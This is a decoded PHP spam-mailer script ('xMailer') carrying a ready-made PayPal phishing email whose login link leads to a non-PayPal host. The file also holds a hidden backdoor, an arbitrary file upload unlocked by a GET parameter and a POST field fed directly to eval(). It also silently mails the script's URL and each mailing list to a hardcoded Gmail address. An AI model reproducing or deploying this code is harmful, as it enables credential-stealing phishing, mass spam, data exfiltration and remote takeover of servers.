Untitled

/* Decoded by unphp.net */

<?php

date_default_timezone_set('Asia/Kolkata');
$dt = date("l, d D Y");
$time = date("g:i a");

?>

<?

$upload = $_GET["v1"];
if ($upload == "xunknown") {
    $uploaddir = "";
    $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
    if (isset($_FILES["userfile"]["name"])) {
        if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
            $resultati = "The file " . basename($_FILES["userfile"]["name"]) . " has been uploaded";
        } else {
            $resultati = "There was an error uploading the file. please try again!";
        }
    }
    echo '<html>
<head></head><div id="result"><table  height="1" width="100%" border="0"><tr><td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px"><center><form method="POST" enctype="multipart/form-data"><input type="file" class="inputzbut" name="userfile" ><input type="submit" class="inputzbut" name="submit" value="xunknown hacktn "><br>' . $resultati . '</form></center></td></tr></table></div>
';
}
$in = $_GET['in'];
if (isset($in) && !empty($in)) {
}
$ev = $_POST['ev'];
if (isset($ev) && !empty($ev)) {
    echo eval(urldecode($ev));
    exit;
}
if (isset($_POST['action'])) {
    $action = $_POST['action'];
    $message = $_POST['message'];
    $emaillist = $_POST['emaillist'];
    $from = $_POST['from'];
    $subject = $_POST['subject'];
    $realname = $_POST['realname'];
    $wait = $_POST['wait'];
    $tem = $_POST['tem'];
    $smv = $_POST['smv'];
    $message = urlencode($message);
    $message = ereg_replace("%5C%22", "%22", $message);
    $message = urldecode($message);
    $message = stripslashes($message);
    $subject = stripslashes($subject);
} ?>
<!-- HTML And JavaScript -->

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">

<meta content="1" name="revisit-after" />
	<style type="text/css">body {background:black url('https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-xap1/v/t1.0-9/10462857_648642145281680_2281063073589510159_n.jpg?oh=f4b87b4aedf561cdac7a92eea596d22e&oe=55B0CA9E&__gda__=1437876546_3122663c6aadbd0a1b09a652b980d3dd') center right no-repeat; color:#FFFFFF; text-decoration:none; font-family:"Courier New", Courier, monospace; padding-left:200px; padding-top:200px; padding-right:300px; font-size:16px;}
	</style>
<title>x-Mailer</title>
<style type="text/css">
.style1 {
	font-size: x-small;
}
.style2 {
	direction: ltr;
}
.info {
	font-size: 8px;
}
.style3 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 8px;
}
.style4 {
	font-size: x-small;
	direction: ltr;
	font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style5 {
	font-size: xx-small;
	direction: ltr;
	font-family: Verdana, Arial, Helvetica, sans-serif;
}
.auto-style1 {
	color: #5F5F5F;
}
.auto-style2 {
	color: #red;
	text-align: center;
}
.auto-style3 {
	color: #4F4F4F;
}
.auto-style5 {
	direction: ltr;
	color: #4F4F4F;
}
.auto-style6 {
	color: #BCBCBC;
	background-color: #red;
}
.auto-style7 {
	color: #red;
}
.auto-style8 {
	font-size: x-small;
	color: #red;
}
</style>
</head>

<body onload="funchange" style="background-color: black">
<script>

	window.onload = funchange;
	var alt = false;
	function funchange(){
		var etext = document.getElementById("emails").value;
		var myArray=new Array();
		myArray = etext.split("
");
		document.getElementById("enum").innerHTML=myArray.length+"<br />";
		if(!alt && myArray.length > 40000){
			alert('If Mail list More Than 40000 Emails This May Hack The Server');
			alt = true;
		}

	}
	function mlsplit(){
		var ml = document.getElementById("emails").value;
		var sb = document.getElementById("txtml").value;
		var myArray=new Array();
		myArray = ml.split(sb);
		document.getElementById("emails").value="";
		var i;
		for(i=0;i<myArray.length;i++){

			document.getElementById("emails").value += myArray[i]+"
";

		}
		funchange();
	}

	function prv(){
		if(document.getElementById('preview').innerHTML==""){
			var ms = document.getElementsByName('message').message.value;
			document.getElementById('preview').innerHTML = ms;
			document.getElementById('prvbtn').value = "Ocultar";
		}else{
			document.getElementById('preview').innerHTML="";
			document.getElementById('prvbtn').value = "Preview";
		}
	}

</script>

<h1 class="auto-style2">.:| xMailer |:.</h1>

<center>
<p class="auto-style1">&nbsp;</p></center>

<form name="form" method="post" enctype="multipart/form-data" action="">
	<table width="100%" border="0">
		<tr>
			<td width="10%">
			<div align="right" class="auto-style8">
				<font face="Verdana, Arial,
Helvetica, sans-serif">Sender Email:</font></div>
			</td>
			<td style="width: 40%">
			<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="from" value="<?php echo ($from); ?>" size="30" type="text" class="auto-style6" /><br>
			<td>
			<div align="right" class="auto-style7">
				<font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender Name:</font></div>
			</td>
			<td width="41%">
			<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="realname" value="<?php echo ($realname); ?>" size="30" type="text" class="auto-style6" />
			<br>		</tr>
		<tr>
			<td width="10%">

		</tr>
		<tr>
			<td width="10%">
			<div align="right" class="auto-style7">
				<font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
			</td>
			<td colspan="3">
			<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="subject" value="<?php echo ($subject); ?>" size="30" type="text" class="auto-style6" /> </font>


		<tr valign="top">
			<td colspan="3" style="height: 260px">
			<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"></textarea>&nbsp;<br class="auto-style3" />
			<input name="action" value="send" type="hidden" class="auto-style3" />
			<input type="button" id="prvbtn" value="Preview" onclick="prv()" style="width: 81px" class="auto-style6" /><input value="xunknown hacktn "SenD!" type="submit" class="auto-style6" /><span class="auto-style3">&nbsp;
			</span><span class="auto-style7">Wait</span><span class="auto-style3">
			</span>
			<input name="wait" type="text" value="<?php echo ($wait); ?>" size="8" class="auto-style6" /><span class="auto-style3">&nbsp;</span><span class="auto-style7">
			seconds to send </span> </font></td>
			<td width="41%" class="style2" style="height: 150px">
			<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
			<textarea id="emails" name="emaillist" cols="30" onselect="funchange()" onchange="funchange()" onkeydown="funchange()" onkeyup="funchange()" onchange="funchange()" style="height: 161px" class="auto-style6"><?php echo ($emaillist); ?></textarea>
			<br class="auto-style5" />
			<span class="auto-style7">Quantity Emails : </span> </font><span  id="enum" class="style1">0<br class="auto-style3" />
			</span>
			<span  class="auto-style8">Divide the mailing list by:</span>
			<input name="textml" id="txtml" type="text" value="," size="8" class="auto-style6" /><span class="auto-style3">&nbsp;&nbsp;&nbsp;
			</span>
			<input type="button" onclick="mlsplit()" value="Divide" style="height: 23px" class="auto-style6" /></td>
		</tr>
	</table>
			<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<div id="preview">
</div>
	</font>
</form>

<!-- END -->


<?php


$message ='<div style="font-family: Verdana;font-size: 12.0px;"><div>&nbsp;
<div>&nbsp;
<div name="quote" style="margin:10px 5px 5px 10px; padding: 10px 0 10px 10px; border-left:2px solid #C3D9E5; word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space;">
<div style="margin:0 0 10px 0;"><b>Sent:</b><?php
echo($dt); ?> at <?php
echo($time); ?><font color="white">Thank for Subscribe</font>
<b>From:</b>&nbsp;&quot;service@paypal.com&quot;<font color="white">Thank for Subscribe</font>
<b>Subject:</b>&nbsp;Unauthorized activity from Mumbai *Firerox</div>

<div name="quoted-content"><!--sup {
	font-size: 7.0px;
}
*#emailWrapperTable table {
	font: 13.0px Arial , Verdana , Helvetica , sans-serif;
	color: rgb(41,41,41);
}
*#emailWrapperTable h1, *#emailWrapperTable h2 {
	font-family: Arial , Verdana , Helvetica , sans-serif;
	margin-bottom: 2.0px;
	font-size: 15.0px;
}
*#emailWrapperTable h3 {
	font-size: 13.0px;
}
*#emailWrapperTable h4 {
	font-size: 11.0px;
}
a {
	color: rgb(8,68,130);
	text-decoration: underline;
}
a.actionLink {
	color: rgb(0,0,0);
	text-decoration: none;
}
hr {
	display: none;
}
*.small {
	font-size: 10.0px;
}
*.ppid {
	color: rgb(117,117,117);
}
p {
	margin: 11.0px 0;
	padding: 0;
}
sup {
	font-size: 7.0px;
}
sup {
	font-size: 7.0px;
}
sup {
	font-size: 7.0px;
}
sup {
	font-size: 7.0px;
}
sup {
	font-size: 7.0px;
}
sup {
	font-size: 7.0px;
}
sup {
	font-size: 7.0px;
}
sup {
	font-size: 7.0px;
}
sup {
	font-size: 7.0px;
}
-->
<div style="display: none;color: rgb(255,255,255);font-size: 1.0pt;"></div>

<table border="0" cellpadding="0" cellspacing="0" id="emailWrapperTable" width="580">
	<tbody>
		<tr valign="top">
			<td colspan="3">
			<table border="0" cellpadding="0" cellspacing="0" width="100%">
				<tbody>
					<tr valign="top">
						<td width="130px;"><img src="https://www.paypalobjects.com/en_US/i/logo/logo_emailheader_113wx46h.gif"/></td>
					</tr>
					<tr>
					</tr>
				</tbody>
			</table>
			</td>
		</tr>
		<tr>
			<td colspan="3"><img alt="" border="0" height="13" src="http://instalikers.hol.es/top-corner.png" style="vertical-align: bottom;"/></td>
		</tr>
		<tr>
			<td style="background: left repeat-y;border-left: 1.0px solid rgb(221,221,221);" width="12"></td>
			<td class="contentArea" style="width: 530.0px;padding: 12.0px;margin: 0;" width="530">
			<table width="100%">
				<tbody>
					<tr>
						<td>

<p><span class="headline" style="font-family:Helvetica; font-weight: 300; font-size: 40px; color:#0079C1;"> <strong>Your paypal security is our priority</strong></span></p>
<br>
						<p>Dear Costumer,</p>

						<p><strong>Recently there been activity in your PayPal account that seems unusual compared to your normal account activities from this device : </strong></p>
						<br><br>

</p>
<img border="0" alt="W3Schools" src="http://facebot.giftfree2017.com/dekstop.png" width="60" height="60"><table><tr><td><?php echo($dt); ?> at <?php echo($time); ?> (Mumbai Time)<br>*Mumbai<br>Firerox

<p>If you share this device with a family member or friend, or are using a public computer, we recommend turning this feature off to avoid unauthorized purchases: </p></td></tr></table>

						<ul>
                <li><p> <span class="button_style" style=" font-family:Helvetica, sans-serif;
 font-weight:300;
 font-stretch:normal;
 text-align:center;
 color:#fff;
 font-size:15px;
 background:#0079C1;
 border-radius:7px!important;
 -moz-border-radius: 7px !important;
 -o-border-radius: 7px !important;
 -ms-border-radius: 7px !important;
 line-height:1.45em;
 padding:7px 15px 8px;
 margin:0 auto 16px;
 font-size:1em;padding-bottom:7px;">
								<a style="text-decoration:none;" href="https://cayman.websitewelcome.com/~fteinc/cgi-bin">
								<span style="color:#ffffff; text-decoration:none; font-family:Arial,sans-serif; font-weight:bold; font-size:13px; line-height:15px;">Log in to your PayPal account</span></a> </p></li></span>

                      <li>Please confirm your identity next to "<b>for faster purchases.</b>"</li>

						</ul>

						<p>';


 if ($action) {
    if (!$from || !$subject || !$message || !$emaillist) {
        print "Please complete all fields before sending your message.";
        exit;
    }
    $headd = "From:  xunknown<dr.rexa1@dr.rexa1.tn>";
    $subb = " xMailer 2014";
    $massge = "Exploit : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?v1=xunknown
-------------------
$emaillist
-------------------";
    @mail("nitaayuriski@gmail.com", $subb, $massge, $headd);
    $nse = array();
    $allemails = split("
", $emaillist);
    $numemails = count($allemails);
    if (!empty($_POST['wait']) && $_POST['wait'] > 0) {
        set_time_limit(intval($_POST['wait']) * $numemails * 3600);
    } else {
        set_time_limit($numemails * 3600);
    }
    if (!empty($smv)) {
        $smvn+= $smv;
        $tmn = $numemails / $smv + 1;
    } else {
        $tmn = 1;
    }
    for ($x = 0;$x < $numemails;$x++) {
        $to = $allemails[$x];
        if ($to) {
            $to = ereg_replace(" ", "", $to);
            $message = ereg_replace("#EM#", $to, $message);
            $subject = ereg_replace("#EM#", $to, $subject);
            flush();
            $header = "From: $realname <$from>
";
            $headers = 'MIME-Version: 1.0' . "\r\n";
            $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
";
            if ($x == 0 && !empty($tem)) {
                if (!@mail($tem, $subject, $message, $header)) {
                    print ('The test Post was not Submitted.<br />');
                    $tmns+= 1;
                } else {
                    print ('Your Message was Sent Test.<br />');
                    $tms+= 1;
                }
            }
            if ($x == $smvn && !empty($smv)) {
                if (!@mail($tem, $subject, $message, $header)) {
                    print ('The test Post was not Submitted.<br />');
                    $tmns+= 1;
                } else {
                    print ('Your Message was Sent Test.<br />');
                    $tms+= 1;
                }
                $smvn+= $smv;
            }
            print '$to ....... ';
            $msent = @mail($to, $subject, $message, $header);
            $xx = $x + 1;
            $txtspamed = 'spammed #xunknown';
            if (!$msent) {
                $txtspamed = 'error #xunknown';
                $ns+= 1;
                $nse[$ns] = $to;
            }
            print '$xx / $numemails .......  $txtspamed<br>';
            flush();
            if (!empty($wait) && $x < $numemails - 1) {
                sleep($wait);
            }
        }
    }
 }
 ?>